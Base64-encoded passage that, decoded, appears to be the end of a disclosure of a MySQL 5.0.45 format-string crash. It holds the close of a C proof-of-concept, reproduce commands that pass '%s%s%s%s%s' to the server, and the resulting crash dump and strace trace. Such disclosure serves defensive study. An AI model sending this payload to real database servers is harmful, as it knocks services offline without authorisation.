MV0sIHN0cmxlbihhcmd2WzFdKSwgMCk7DQoNCiAgICB9DQoNCiAgbXlzcWxfY2xvc2UgKG15c3Fs
KTsNCg0KICByZXR1cm4gRVhJVF9TVUNDRVNTOw0KfQ0KLS0tc25pcC0tLQ0KDQpyZXByb2R1Y2U6
DQokZ2NjIG15c3FsX2Zvcm1hdC5jIC1vIG15c3FsX2Zvcm1hdCAtbG15c3FsY2xpZW50DQokLi9t
eXNxbF9mb3JtYXQgJXMlcyVzJXMlcw0KDQoNCkRlYnVnZ2luZyBvdXRwdXQgZm9sbG93cyAtIENy
YXNoZHVtcCBhbmQgc3RyYWNlIG91dHB1dA0KDQp+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+
fn5+fn5+fn5+fn5+fn5+fn5+fn5+fg0KVmVyc2lvbjogJzUuMC40NS1sb2cnICBzb2NrZXQ6ICcv
dmFyL2xpYi9teXNxbC9teXNxbC5zb2NrJyAgcG9ydDogMzMwNiAgU291cmNlIGRpc3RyaWJ1dGlv
bg0KMDkwNjIwICAxOjUzOjUyIC0gbXlzcWxkIGdvdCBzaWduYWwgMTE7DQpUaGlzIGNvdWxkIGJl
IGJlY2F1c2UgeW91IGhpdCBhIGJ1Zy4gSXQgaXMgYWxzbyBwb3NzaWJsZSB0aGF0IHRoaXMgYmlu
YXJ5DQpvciBvbmUgb2YgdGhlIGxpYnJhcmllcyBpdCB3YXMgbGlua2VkIGFnYWluc3QgaXMgY29y
cnVwdCwgaW1wcm9wZXJseSBidWlsdCwNCm9yIG1pc2NvbmZpZ3VyZWQuIFRoaXMgZXJyb3IgY2Fu
IGFsc28gYmUgY2F1c2VkIGJ5IG1hbGZ1bmN0aW9uaW5nIGhhcmR3YXJlLg0KV2Ugd2lsbCB0cnkg
b3VyIGJlc3QgdG8gc2NyYXBlIHVwIHNvbWUgaW5mbyB0aGF0IHdpbGwgaG9wZWZ1bGx5IGhlbHAg
ZGlhZ25vc2UNCnRoZSBwcm9ibGVtLCBidXQgc2luY2Ugd2UgaGF2ZSBhbHJlYWR5IGNyYXNoZWQs
IHNvbWV0aGluZyBpcyBkZWZpbml0ZWx5IHdyb25nDQphbmQgdGhpcyBtYXkgZmFpbC4NCg0Ka2V5
X2J1ZmZlcl9zaXplPTgzODg2MDANCnJlYWRfYnVmZmVyX3NpemU9MTMxMDcyDQptYXhfdXNlZF9j
b25uZWN0aW9ucz0xDQptYXhfY29ubmVjdGlvbnM9MTAwDQp0aHJlYWRzX2Nvbm5lY3RlZD0xDQpJ
dCBpcyBwb3NzaWJsZSB0aGF0IG15c3FsZCBjb3VsZCB1c2UgdXAgdG8NCmtleV9idWZmZXJfc2l6
ZSArIChyZWFkX2J1ZmZlcl9zaXplICsgc29ydF9idWZmZXJfc2l6ZSkqbWF4X2Nvbm5lY3Rpb25z
ID0gMjI1NzkxIEsNCmJ5dGVzIG9mIG1lbW9yeQ0KSG9wZSB0aGF0J3Mgb2s7IGlmIG5vdCwgZGVj
cmVhc2Ugc29tZSB2YXJpYWJsZXMgaW4gdGhlIGVxdWF0aW9uLg0KDQp0aGQ9MHg4YWVhOGE4DQpB
dHRlbXB0aW5nIGJhY2t0cmFjZS4gWW91IGNhbiB1c2UgdGhlIGZvbGxvd2luZyBpbmZvcm1hdGlv
biB0byBmaW5kIG91dA0Kd2hlcmUgbXlzcWxkIGRpZWQuIElmIHlvdSBzZWUgbm8gbWVzc2FnZXMg
YWZ0ZXIgdGhpcywgc29tZXRoaW5nIHdlbnQNCnRlcnJpYmx5IHdyb25nLi4uDQpDYW5ub3QgZGV0
ZXJtaW5lIHRocmVhZCwgZnA9MHhiMDM4ZDdlYywgYmFja3RyYWNlIG1heSBub3QgYmUgY29ycmVj
dC4NClN0YWNrIHJhbmdlIHNhbml0eSBjaGVjayBPSywgYmFja3RyYWNlIGZvbGxvd3M6DQoweDgx
ODczOTMNCjB4YjdiZThhZmINCjB4ODIwOGRjNA0KMHg4MWE1NWUyDQoweDgxYTU4YjcNCjB4ODFh
NjQ4Nw0KMHhiN2UyYTMzYQ0KMHhiN2M0YjVjZQ0KTmV3IHZhbHVlIG9mIGZwPShuaWwpIGZhaWxl
ZCBzYW5pdHkgY2hlY2ssIHRlcm1pbmF0aW5nIHN0YWNrIHRyYWNlIQ0KUGxlYXNlIHJlYWQgaHR0
cDovL2Rldi5teXNxbC5jb20vZG9jL215c3FsL2VuL3VzaW5nLXN0YWNrLXRyYWNlLmh0bWwgYW5k
IGZvbGxvdyBpbnN0cnVjdGlvbnMgb24gaG93IHRvIHJlc29sdmUgdGhlIHN0YWNrIHRyYWNlLiBS
ZXNvbHZlZA0Kc3RhY2sgdHJhY2UgaXMgbXVjaCBtb3JlIGhlbHBmdWwgaW4gZGlhZ25vc2luZyB0
aGUgcHJvYmxlbSwgc28gcGxlYXNlIGRvDQpyZXNvbHZlIGl0DQpUcnlpbmcgdG8gZ2V0IHNvbWUg
dmFyaWFibGVzLg0KU29tZSBwb2ludGVycyBtYXkgYmUgaW52YWxpZCBhbmQgY2F1c2UgdGhlIGR1
bXAgdG8gYWJvcnQuLi4NCnRoZC0+cXVlcnkgYXQgKG5pbCkgIGlzIGludmFsaWQgcG9pbnRlcg0K
dGhkLT50aHJlYWRfaWQ9MQ0KVGhlIG1hbnVhbCBwYWdlIGF0IGh0dHA6Ly93d3cubXlzcWwuY29t
L2RvYy9lbi9DcmFzaGluZy5odG1sIGNvbnRhaW5zDQppbmZvcm1hdGlvbiB0aGF0IHNob3VsZCBo
ZWxwIHlvdSBmaW5kIG91dCB3aGF0IGlzIGNhdXNpbmcgdGhlIGNyYXNoLg0KDQpOdW1iZXIgb2Yg
cHJvY2Vzc2VzIHJ1bm5pbmcgbm93OiAwDQowOTA2MjAgMDE6NTM6NTIgIG15c3FsZCByZXN0YXJ0
ZWQNCjA5MDYyMCAgMTo1Mzo1MiAgSW5ub0RCOiBTdGFydGVkOyBsb2cgc2VxdWVuY2UgbnVtYmVy
IDAgNDg3Njc3Nw0KMDkwNjIwICAxOjUzOjUyIFtOb3RlXSAvdXNyL2xpYmV4ZWMvbXlzcWxkOiBy
ZWFkeSBmb3IgY29ubmVjdGlvbnMuDQpWZXJzaW9uOiAnNS4wLjQ1LWxvZycgIHNvY2tldDogJy92
YXIvbGliL215c3FsL215c3FsLnNvY2snICBwb3J0OiAzMzA2ICBTb3VyY2UgZGlzdHJpYnV0aW9u
DQp+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fg0KDQoN
CjI2NDU0IGZ1dGV4KDB4OGE2ZmY5MCwgRlVURVhfV0FJVCwgMSwgTlVMTCA8dW5maW5pc2hlZCAu
Li4+DQoyNjQ1MyBzZWxlY3QoMTQsIFsxMSAxM10sIE5VTEwsIE5VTEwsIE5VTEwgPHVuZmluaXNo
ZWQgLi4uPg0KMjY0NTUgZnV0ZXgoMHg4YTcwMDAwLCBGVVRFWF9XQUlULCA1LCBOVUxMIDx1bmZp
bmlzaGVkIC4uLj4NCjI2NDU2IGZ1dGV4KDB4OGE3MDA3MCwgRlVURVhfV0FJVCwgMywgTlVMTCA8
dW5maW5pc2hlZCAuLi4+DQoyNjQ1NyBmdXRleCgweDhhNzAwZTAsIEZVVEVYX1dBSVQsIDEsIE5V
TEwgPHVuZmluaXNoZWQgLi4uPg0KMjY0NTkgc2VsZWN0KDAsIE5VTEwsIE5VTEwsIE5VTEwsIHsw
LCA1NTAwMH0gPHVuZmluaXNoZWQgLi4uPg0KMjY0NjAgc2VsZWN0KDAsIE5VTEwsIE5VTEwsIE5V
TEwsIHswLCA5NTMwMDB9IDx1bmZpbmlzaGVkIC4uLj4NCjI2NDYxIGZ1dGV4KDB4ODcyYTYzMCwg
RlVURVhfV0FJVCwgMSwgTlVMTCA8dW5maW5pc2hlZCAuLi4+DQoyNjQ2MiBydF9zaWd0aW1lZHdh
aXQoW0hVUCBRVUlUIEFMUk0gVEVSTSBUU1RQXSwgIDx1bmZpbmlzaGVkIC4uLj4NCjI2NDYzIGZ1
dGV4KDB4ODZlMjA0NCwgRlVURVhfV0FJVCwgMSwgTlVMTCA8dW5maW5pc2hlZCAuLi4+DQoyNjQ1
OSA8Li4uIHNlbGVjdCByZXN1bWVkPiApICAgICAgICAgICAgPSAwIChUaW1lb3V0KQ0KMjY0NTkg
dGltZShOVUxMKSAgICAgICAgICAgICAgICAgICAgICAgID0gMTI0NTQ1NjUzOA0KMjY0NTkgc2Vs
ZWN0KDAsIE5VTEwsIE5VTEwsIE5VTEwsIHsxLCAwfSA8dW5maW5pc2hlZCAuLi4+DQoyNjQ2MCA8
Li4uIHNlbGVjdCByZXN1bWVkPiApICAgICAgICAgICAgPSAwIChUaW1lb3V0KQ0KMjY0NjAgdGlt
ZShOVUxMKSAgICAgICAgICAgICAgICAgICAgICAgID0gMTI0NTQ1NjUzOA0KMjY0NjAgc2VsZWN0
KDAsIE5VTEwsIE5VTEwsIE5VTEwsIHsyLCAwfSA8dW5maW5pc2hlZCAuLi4+DQoyNjQ1OSA8Li4u
IHNlbGVjdCByZXN1bWVkPiApICAgICAgICAgICAgPSAwIChUaW1lb3V0KQ0KMjY0NTkgdGltZShO
VUxMKSAgICAgICAgICAgICAgICAgICAgICAgID0gMTI0NTQ1NjUzOQ0KMjY0NTkgc2VsZWN0KDAs
IE5VTEwsIE5VTEwsIE5VTEwsIHsxLCAwfSkgPSAwIChUaW1lb3V0KQ0KMjY0NTkgdGltZShOVUxM
KSAgICAgICAgICAgICAgICAgICAgICAgID0gMTI0NTQ1NjU0MA0KMjY0NTkgc2VsZWN0KDAsIE5V
TEwsIE5VTEwsIE5VTEwsIHsxLCAwfSA8dW5maW5pc2hlZCAuLi4+DQoyNjQ2MCA8Li4uIHNlbGVj
dCByZXN1bWVkPiApICAgICAgICAgICAgPSAwIChUaW1lb3V0KQ0KMjY0NjAgdGltZShOVUxMKSAg
ICAgICAgICAgICAgICAgICAgICAgID0gMTI0NTQ1NjU0MA0KMjY0NjAgc2VsZWN0KDAsIE5VTEws
IE5VTEwsIE5VTEwsIHsyLCAwfSA8dW5maW5pc2hlZCAuLi4+DQoyNjQ1OSA8Li4uIHNlbGVjdCBy
ZXN1bWVkPiApICAgICAgICAgICAgPSAwIChUaW1lb3V0KQ0KMjY0NTkgdGltZShOVUxMKSAgICAg
ICAgICAgICAgICAgICAgICAgID0gMTI0NTQ1NjU0MQ0KMjY0NTkgc2VsZWN0KDAsIE5VTEwsIE5V
TEwsIE5VTEwsIHsxLCAwfSkgPSAwIChUaW1lb3V0KQ0KMjY0NTkgdGltZShOVUxMKSAgICAgICAg
ICAgICAgICAgICAgICAgID0gMTI0NTQ1NjU0Mg0KMjY0NTkgc2VsZWN0KDAsIE5VTEwsIE5VTEws
IE5VTEwsIHsxLCAwfSA8dW5maW5pc2hlZCAuLi4+DQoyNjQ2MCA8Li4uIHNlbGVjdCByZXN1bWVk
PiApICAgICAgICAgICAgPSAwIChUaW1lb3V0KQ0KMjY0NjAgdGltZShOVUxMKSAgICAgICAgICAg
ICAgICAgICAgICAgID0gMTI0NTQ1NjU0Mg0KMjY0NjAgc2VsZWN0KDAsIE5VTEwsIE5VTEwsIE5V
TEwsIHsyLCAwfSA8dW5maW5pc2hlZCAuLi4+DQoyNjQ1OSA8Li4uIHNlbGVjdCByZXN1bWVkPiAp
ICAgICAgICAgICAgPSAwIChUaW1lb3V0KQ0KMjY0NTkgdGltZShOVUxMKSAgICAgICAgICAgICAg
ICAgICAgICAgID0gMTI0NTQ1NjU0Mw0KMjY0NTkgc2VsZWN0KDAsIE5VTEwsIE5VTEwsIE5VTEws
IHsxLCAwfSkgPSAwIChUaW1lb3V0KQ0KMjY0NTkgdGltZShOVUxMKSAgICAgICAgICAgICAgICAg
ICAgICAgID0gMTI0NTQ1NjU0NA0KMjY0NTkgdGltZShOVUxMKSAgICAgICAgICAgICAgICAgICAg
ICAgID0gMTI0NTQ1NjU0NA0KMjY0NTkgc2VsZWN0KDAsIE5VTEwsIE5VTEwsIE5VTEwsIHsxLCAw
fSA8dW5maW5pc2hlZCAuLi4+DQoyNjQ2MCA8Li4uIHNlbGVjdCByZXN1bWVkPiApICAgICAgICAg
ICAgPSAwIChUaW1lb3V0KQ0KMjY0NjAgdGltZShOVUxMKSAgICAgICAgICAgICAgICAgICAgICAg
ID0gMTI0NTQ1NjU0NA0KMjY0NjAgc2VsZWN0KDAsIE5VTEwsIE5VTEwsIE5VTEwsIHsyLCAwfSA8
dW5maW5pc2hlZCAuLi4+DQoyNjQ1OSA8Li4uIHNlbGVjdCByZXN1bWVkPiApICAgICAgICAgICAg
PSAwIChUaW1lb3V0KQ0KMjY0NTkgdGltZShOVUxMKSAgICAgICAgICAgICAgICAgICAgICAgID0g
MTI0NTQ1NjU0NQ0KMjY0NTkgc2VsZWN0KDAsIE5VTEwsIE5VTEwsIE5VTEwsIHsxLCAwfSkgPSAw
IChUaW1lb3V0KQ0KMjY0NTkgdGltZShOVUxMKSAgICAgICAgICAgICAgICAgICAgICAgID0gMTI0
NTQ1NjU0Ng0KMjY0NTkgc2VsZWN0KDAsIE5VTEwsIE5VTEwsIE5VTEwsIHsxLCAwfSA8dW5maW5p
c2hlZCAuLi4+DQoyNjQ2MCA8Li4uIHNlbGVjdCByZXN1bWVkPiApICAgICAgICAgICAgPSAwIChU
aW1lb3V0KQ0KMjY0NjAgdGltZShOVUxMKSAgICAgICAgICAgICAgICAgICAgICAgID0gMTI0NTQ1
NjU0Ng0KMjY0NjAgc2VsZWN0KDAsIE5VTEwsIE5VTEwsIE5VTEwsIHsyLCAwfSA8dW5maW5pc2hl
ZCAuLi4+DQoyNjQ1OSA8Li4uIHNlbGVjdCByZXN1bWVkPiApICAgICAgICAgICAgPSAwIChUaW1l
b3V0KQ0KMjY0NTkgdGltZShOVUxMKSAgICAgICAgICAgICAgICAgICAgICAgID0gMTI0NTQ1NjU0
Nw0KMjY0NTkgc2VsZWN0KDAsIE5VTEwsIE5VTEwsIE5VTEwsIHsxLCAwfSA8dW5maW5pc2hlZCAu
Li4+DQoyNjQ1MyA8Li4uIHNlbGVjdCByZXN1bWVkPiApICAgICAgICAgICAgPSAxIChpbiBbMTNd
KQ0KMjY0NTMgZmNudGw2NCgxMywgRl9TRVRGTCwgT19SRFdSfE9fTk9OQkxPQ0spID0gMA0KMjY0
NTMgYWNjZXB0KDEzLCB7c2FfZmFtaWx5PUFGX0ZJTEUsIHBhdGg9Iv+/ASJ9LCBbMl0pID0gMjYN
CjI2NDUzIGZjbnRsNjQoMTMsIEZfU0VURkwsIE9fUkRXUikgICAgICA9IDANCjI2NDUzIGdldHNv
Y2tuYW1lKDI2LCB7c2FfZmFtaWx5PUFGX0ZJTEUsIHBhdGg9Ii92YXIvbGliL215c3FsASJ9LCBb
MjhdKSA9IDANCjI2NDUzIGZjbnRsNjQoMjYsIEZfU0VURkwsIE9fUkRPTkxZKSAgICA9IDANCjI2
NDUzIGZjbnRsNjQoMjYsIEZfR0VURkwpICAgICAgICAgICAgICA9IDB4MiAoZmxhZ3MgT19SRFdS
KQ0KMjY0NTMgZmNudGw2NCgyNiwgRl9TRVRGTCwgT19SRFdSfE9fTk9OQkxPQ0spID0gMA0KMjY0
NTMgc2V0c29ja29wdCgyNiwgU09MX0lQLCBJUF9UT1MsIFs4XSwgNCkgPSAtMSBFT1BOT1RTVVBQ
IChPcGVyYXRpb24gbm90IHN1cHBvcnRlZCkNCjI2NDUzIHRpbWUoTlVMTCkgICAgICAgICAgICAg
ICAgICAgICAgICA9IDEyNDU0NTY1NDcNCjI2NDUzIG1tYXAyKE5VTEwsIDIwMDcwNCwgUFJPVF9S
RUFEfFBST1RfV1JJVEUsIE1BUF9QUklWQVRFfE1BUF9BTk9OWU1PVVMsIC0xLCAwKSA9IDB4YjAz
NWUwMDANCjI2NDUzIG1wcm90ZWN0KDB4YjAzNWUwMDAsIDQwOTYsIFBST1RfTk9ORSkgPSAwDQoy
NjQ1MyBjbG9uZShjaGlsZF9zdGFjaz0weGIwMzhlNDk0LCBmbGFncz1DTE9ORV9WTXxDTE9ORV9G
U3xDTE9ORV9GSUxFU3xDTE9ORV9TSUdIQU5EfENMT05FX1RIUkVBRHxDTE9ORV9TWVNWU0VNfENM
T05FX1NFVFRMU3xDTE9ORV9QQVJFTlRfU0VUVElEfENMT05FX0NISUxEX0NMRUFSVElELCBwYXJl
bnRfdGlkcHRyPTB4YjAzOGViZDgsIHtlbnRyeV9udW1iZXI6NiwgYmFzZV9hZGRyOjB4YjAzOGVi
OTAsIGxpbWl0OjEwNDg1NzUsIHNlZ18zMmJpdDoxLCBjb250ZW50czowLCByZWFkX2V4ZWNfb25s
eTowLCBsaW1pdF9pbl9wYWdlczoxLCBzZWdfbm90X3ByZXNlbnQ6MCwgdXNlYWJsZToxfSwgY2hp
bGRfdGlkcHRyPTB4YjAzOGViZDgpID0gMTYxNDcNCjI2NDUzIHNlbGVjdCgxNCwgWzExIDEzXSwg
TlVMTCwgTlVMTCwgTlVMTCA8dW5maW5pc2hlZCAuLi4+DQoxNjE0NyB0aW1lKE5VTEwpICAgICAg
ICAgICAgICAgICAgICAgICAgPSAxMjQ1NDU2NTQ3DQoxNjE0NyBydF9zaWdwcm9jbWFzayhTSUdf
VU5CTE9DSywgW10sIFtIVVAgSU5UIFFVSVQgUElQRSBBTFJNIFRFUk0gVFNUUF0sIDgpID0gMA0K
MTYxNDcgc2V0c29ja29wdCgyNiwgU09MX1NPQ0tFVCwgU09fS0VFUEFMSVZFLCBbMV0sIDQpID0g
MA0KMTYxNDcgd3JpdGUoMjYsICI4XDBcMFwwXG41LjAuNDUtbG9nXDBcMVwwXDBcMF0vbVpaNDZS
XDAsXDI0MlwzMDAiLi4uLCA2MCkgPSA2MA0KMTYxNDcgcmVhZCgyNiwgMHg4YjE5YWUwLCA0KSAg
ICAgICAgICAgID0gLTEgRUFHQUlOIChSZXNvdXJjZSB0ZW1wb3JhcmlseSB1bmF2YWlsYWJsZSkN
CjE2MTQ3IHRpbWUoTlVMTCkgICAgICAgICAgICAgICAgICAgICAgICA9IDEyNDU0NTY1NDcNCjE2
MTQ3IHJ0X3NpZ3Byb2NtYXNrKFNJR19CTE9DSywgfltSVE1JTiBSVF8xXSwgW0hVUCBJTlQgUVVJ
VCBQSVBFIEFMUk0gVEVSTSBUU1RQXSwgOCkgPSAwDQoxNjE0NyB0Z2tpbGwoMjY0NTMsIDI2NDYy
LCBTSUdBTFJNKSAgICAgPSAwDQoyNjQ2MiA8Li4uIHJ0X3NpZ3RpbWVkd2FpdCByZXN1bWVkPiAw
LCAwLCA4KSA9IDE0DQoxNjE0NyBydF9zaWdwcm9jbWFzayhTSUdfU0VUTUFTSywgW0hVUCBJTlQg
UVVJVCBQSVBFIEFMUk0gVEVSTSBUU1RQXSwgIDx1bmZpbmlzaGVkIC4uLj4NCjI2NDYyIHJ0X3Np
Z3Byb2NtYXNrKFNJR19TRVRNQVNLLCB+W1JUTUlOIFJUXzFdLCAgPHVuZmluaXNoZWQgLi4uPg0K
MTYxNDcgPC4uLiBydF9zaWdwcm9jbWFzayByZXN1bWVkPiBOVUxMLCA4KSA9IDANCjI2NDYyIDwu
Li4gcnRfc2lncHJvY21hc2sgcmVzdW1lZD4gW0hVUCBJTlQgUVVJVCBQSVBFIEFMUk0gVEVSTSBU
U1RQXSwgOCkgPSAwDQoxNjE0NyBmY250bDY0KDI2LCBGX1NFVEZMLCBPX1JEV1IgPHVuZmluaXNo
ZWQgLi4uPg0KMjY0NjIgdGltZSggPHVuZmluaXNoZWQgLi4uPg0KMTYxNDcgPC4uLiBmY250bDY0
IHJlc3VtZWQ+ICkgICAgICAgICAgID0gMA0KMjY0NjIgPC4uLiB0aW1lIHJlc3VtZWQ+IE5VTEwp
ICAgICAgICAgID0gMTI0NTQ1NjU0Nw0KMTYxNDcgcmVhZCgyNiwgIDx1bmZpbmlzaGVkIC4uLj4N
CjI2NDYyIGFsYXJtKDUpICAgICAgICAgICAgICAgICAgICAgICAgICA9IDANCjI2NDYyIHJ0X3Np
Z3Byb2NtYXNrKFNJR19TRVRNQVNLLCBbSFVQIElOVCBRVUlUIFBJUEUgQUxSTSBURVJNIFRTVFBd
LCBOVUxMLCA4KSA9IDANCjI2NDYyIHJ0X3NpZ3RpbWVkd2FpdChbSFVQIFFVSVQgQUxSTSBURVJN
IFRTVFBdLCAgPHVuZmluaXNoZWQgLi4uPg0KMTYxNDcgPC4uLiByZWFkIHJlc3VtZWQ+ICImXDBc
MFwxIiwgNCkgID0gNA0KMTYxNDcgcmVhZCgyNiwgIlwyMDdcMjQyXDBcMFwwXDBcMEBcMTBcMFww
XDBcMFwwXDBcMFwwXDBcMFwwXDBcMFwwXDBcMFwwXDBcMFwwXDBcMFwwIi4uLiwgMzgpID0gMzgN
CjE2MTQ3IHJ0X3NpZ3Byb2NtYXNrKFNJR19CTE9DSywgfltSVE1JTiBSVF8xXSwgW0hVUCBJTlQg
UVVJVCBQSVBFIEFMUk0gVEVSTSBUU1RQXSwgOCkgPSAwDQoxNjE0NyBydF9zaWdwcm9jbWFzayhT
SUdfU0VUTUFTSywgW0hVUCBJTlQgUVVJVCBQSVBFIEFMUk0gVEVSTSBUU1RQXSwgTlVMTCwgOCkg
PSAwDQoxNjE0NyBmY250bDY0KDI2LCBGX1NFVEZMLCBPX1JEV1J8T19OT05CTE9DSykgPSAwDQox
NjE0NyB0aW1lKE5VTEwpICAgICAgICAgICAgICAgICAgICAgICAgPSAxMjQ1NDU2NTQ3DQoxNjE0
NyB3cml0ZSgzLCAiMDkwNjIwICAyOjA5OjA3XHQgICAgICAxIENvbm5lY3QgIi4uLiwgNTUpID0g
NTUNCjE2MTQ3IHdyaXRlKDI2LCAiXDdcMFwwXDJcMFwwXDBcMlwwXDBcMCIsIDExKSA9IDExDQox
NjE0NyB0aW1lKE5VTEwpICAgICAgICAgICAgICAgICAgICAgICAgPSAxMjQ1NDU2NTQ3DQoxNjE0
NyByZWFkKDI2LCAweDhiMTlhZTAsIDQpICAgICAgICAgICAgPSAtMSBFQUdBSU4gKFJlc291cmNl
IHRlbXBvcmFyaWx5IHVuYXZhaWxhYmxlKQ0KMTYxNDcgdGltZShOVUxMKSAgICAgICAgICAgICAg
ICAgICAgICAgID0gMTI0NTQ1NjU0Nw0KMTYxNDcgcnRfc2lncHJvY21hc2soU0lHX0JMT0NLLCB+
W1JUTUlOIFJUXzFdLCBbSFVQIElOVCBRVUlUIFBJUEUgQUxSTSBURVJNIFRTVFBdLCA4KSA9IDAN
CjE2MTQ3IHRna2lsbCgyNjQ1MywgMjY0NjIsIFNJR0FMUk0pICAgICA9IDANCjE2MTQ3IHJ0X3Np
Z3Byb2NtYXNrKFNJR19TRVRNQVNLLCBbSFVQIElOVCBRVUlUIFBJUEUgQUxSTSBURVJNIFRTVFBd
LCBOVUxMLCA4KSA9IDANCjE2MTQ3IGZjbnRsNjQoMjYsIEZfU0VURkwsIE9fUkRXUikgICAgICA9
IDANCjE2MTQ3IHJlYWQoMjYsICA8dW5maW5pc2hlZCAuLi4+DQoyNjQ2MiA8Li4uIHJ0X3NpZ3Rp
bWVkd2FpdCByZXN1bWVkPiAwLCAwLCA4KSA9IDE0DQoxNjE0NyA8Li4uIHJlYWQgcmVzdW1lZD4g
Ilx2XDBcMFwwIiwgNCkgPSA0DQoxNjE0NyByZWFkKDI2LCAiXDUlcyVzJXMlcyVzIiwgMTEpICAg
ICAgPSAxMQ0KMTYxNDcgcnRfc2lncHJvY21hc2soU0lHX0JMT0NLLCB+W1JUTUlOIFJUXzFdLCBb
SFVQIElOVCBRVUlUIFBJUEUgQUxSTSBURVJNIFRTVFBdLCA4KSA9IDANCjE2MTQ3IHJ0X3NpZ3By
b2NtYXNrKFNJR19TRVRNQVNLLCBbSFVQIElOVCBRVUlUIFBJUEUgQUxSTSBURVJNIFRTVFBdLCBO
VUxMLCA4KSA9IDANCjE2MTQ3IGZjbnRsNjQoMjYsIEZfU0VURkwsIE9fUkRXUnxPX05PTkJMT0NL
KSA9IDANCjE2MTQ3IHRpbWUoTlVMTCkgICAgICAgICAgICAgICAgICAgICAgICA9IDEyNDU0NTY1
NDcNCjE2MTQ3IC0tLSBTSUdTRUdWIChTZWdtZW50YXRpb24gZmF1bHQpIEAgMCAoMCkgLS0tDQox
NjE0NyB0aW1lKE5VTEwpICAgICAgICAgICAgICAgICAgICAgICAgPSAxMjQ1NDU2NTQ3DQoxNjE0
NyB3cml0ZSgyLCAiMDkwNjIwICAyOjA5OjA3IC0gbXlzcWxkIGdvdCBzaWciLi4uLCAyNjYpID0g
MjY2DQoxNjE0NyB3cml0ZSgyLCAiV2Ugd2lsbCB0cnkgb3VyIGJlc3QgdG8gc2NyYXBlIHUiLi4u
LCAxNzYpID0gMTc2DQoxNjE0NyB3cml0ZSgyLCAia2V5X2J1ZmZlcl9zaXplPTgzODg2MDBcbiIs
IDI0KSA9IDI0DQoxNjE0NyB3cml0ZSgyLCAicmVhZF9idWZmZXJfc2l6ZT0xMzEwNzJcbiIsIDI0
KSA9IDI0DQoxNjE0NyB3cml0ZSgyLCAibWF4X3VzZWRfY29ubmVjdGlvbnM9MVxuIiwgMjMpID0g
MjMNCjE2MTQ3IHdyaXRlKDIsICJtYXhfY29ubmVjdGlvbnM9MTAwXG4iLCAyMCkgPSAyMA0KMTYx
NDcgd3JpdGUoMiwgInRocmVhZHNfY29ubmVjdGVkPTFcbiIsIDIwKSA9IDIwDQoxNjE0NyB3cml0
ZSgyLCAiSXQgaXMgcG9zc2libGUgdGhhdCBteXNxbGQgY291bGQiLi4uLCAxNDMpID0gMTQzDQox
NjE0NyB3cml0ZSgyLCAiSG9wZSB0aGF0XCdzIG9rOyBpZiBub3QsIGRlY3JlYXNlIi4uLiwgNjYp
ID0gNjYNCjE2MTQ3IHdyaXRlKDIsICJ0aGQ9MHg4YWVhOGE4XG4iLCAxNCkgICA9IDE0DQoxNjE0
NyB3cml0ZSgyLCAiQXR0ZW1wdGluZyBiYWNrdHJhY2UuIFlvdSBjYW4gdXMiLi4uLCAxNTkpID0g
MTU5DQoxNjE0NyB3cml0ZSgyLCAiQ2Fubm90IGRldGVybWluZSB0aHJlYWQsIGZwPTB4YjAiLi4u
LCA3MCkgPSA3MA0KMTYxNDcgd3JpdGUoMiwgIlN0YWNrIHJhbmdlIHNhbml0eSBjaGVjayBPSywg
YmFjIi4uLiwgNDgpID0gNDgNCjE2MTQ3IHdyaXRlKDIsICIweDgxODczOTNcbiIsIDEwKSAgICAg
ICA9IDEwDQoxNjE0NyB3cml0ZSgyLCAiMHhiN2JlOGFmYlxuIiwgMTEpICAgICAgPSAxMQ0KMTYx
NDcgd3JpdGUoMiwgIjB4ODIwOGRjNFxuIiwgMTApICAgICAgID0gMTANCjE2MTQ3IHdyaXRlKDIs
ICIweDgxYTU1ZTJcbiIsIDEwKSAgICAgICA9IDEwDQoxNjE0NyB3cml0ZSgyLCAiMHg4MWE1OGI3
XG4iLCAxMCkgICAgICAgPSAxMA0KMTYxNDcgd3JpdGUoMiwgIjB4ODFhNjQ4N1xuIiwgMTApICAg
ICAgID0gMTANCjE2MTQ3IHdyaXRlKDIsICIweGI3ZTJhMzNhXG4iLCAxMSkgICAgICA9IDExDQox
NjE0NyB3cml0ZSgyLCAiMHhiN2M0YjVjZVxuIiwgMTEpICAgICAgPSAxMQ0KMTYxNDcgd3JpdGUo
MiwgIk5ldyB2YWx1ZSBvZiBmcD0obmlsKSBmYWlsZWQgc2FuIi4uLiwgNjgpID0gNjgNCjE2MTQ3
IHdyaXRlKDIsICJQbGVhc2UgcmVhZCBodHRwOi8vZGV2Lm15c3FsLmNvbSIuLi4sIDIyMikgPSAy
MjINCjE2MTQ3IHdyaXRlKDIsICJUcnlpbmcgdG8gZ2V0IHNvbWUgdmFyaWFibGVzLlxuU28iLi4u
LCA5MCkgPSA5MA0KMTYxNDcgd3JpdGUoMiwgInRoZC0+cXVlcnkgYXQgKG5pbCkgIiwgMjApID0g
MjANCjE2MTQ3IHdyaXRlKDIsICIgaXMgaW52YWxpZCBwb2ludGVyXG4iLCAyMCkgPSAyMA0KMTYx
NDcgd3JpdGUoMiwgInRoZC0+dGhyZWFkX2lkPTFcbiIsIDE3KSA9IDE3DQoxNjE0NyB3cml0ZSgy
LCAiVGhlIG1hbnVhbCBwYWdlIGF0IGh0dHA6Ly93d3cubXkiLi4uLCAxMzkpID0gMTM5DQoxNjE0
NyBleGl0X2dyb3VwKDEpICAgICAgICAgICAgICAgICAgICAgPSA/DQoyNjQ2MiBydF9zaWdwcm9j
bWFzayhTSUdfU0VUTUFTSywgfltSVE1JTiBSVF8xXSwgIDx1bmZpbmlzaGVkIC4uLj4NCjI2NDYz
IDwuLi4gZnV0ZXggcmVzdW1lZD4gKSAgICAgICAgICAgICA9IC0xIEVJTlRSIChJbnRlcnJ1cHRl
ZCBzeXN0ZW0gY2FsbCkNCjI2NDU5IDwuLi4gc2VsZWN0IHJlc3VtZWQ+ICkgICAgICAgICAgICA9
ID8gRVJFU1RBUlROT0hBTkQgKFRvIGJlIHJlc3RhcnRlZCkNCjI2NDUzIDwuLi4gc2VsZWN0IHJl
c3VtZWQ+ICkgICAgICAgICAgICA9ID8gRVJFU1RBUlROT0hBTkQgKFRvIGJlIHJlc3RhcnRlZCkN
CjI2NDU0IDwuLi4gZnV0ZXggcmVzdW1lZD4gKSAgICAgICAgICAgICA9IC0xIEVJTlRSIChJbnRl
cnJ1cHRlZCBzeXN0ZW0gY2FsbCkNCjI2NDU1IDwuLi4gZnV0ZXggcmVzdW1lZD4gKSAgICAgICAg
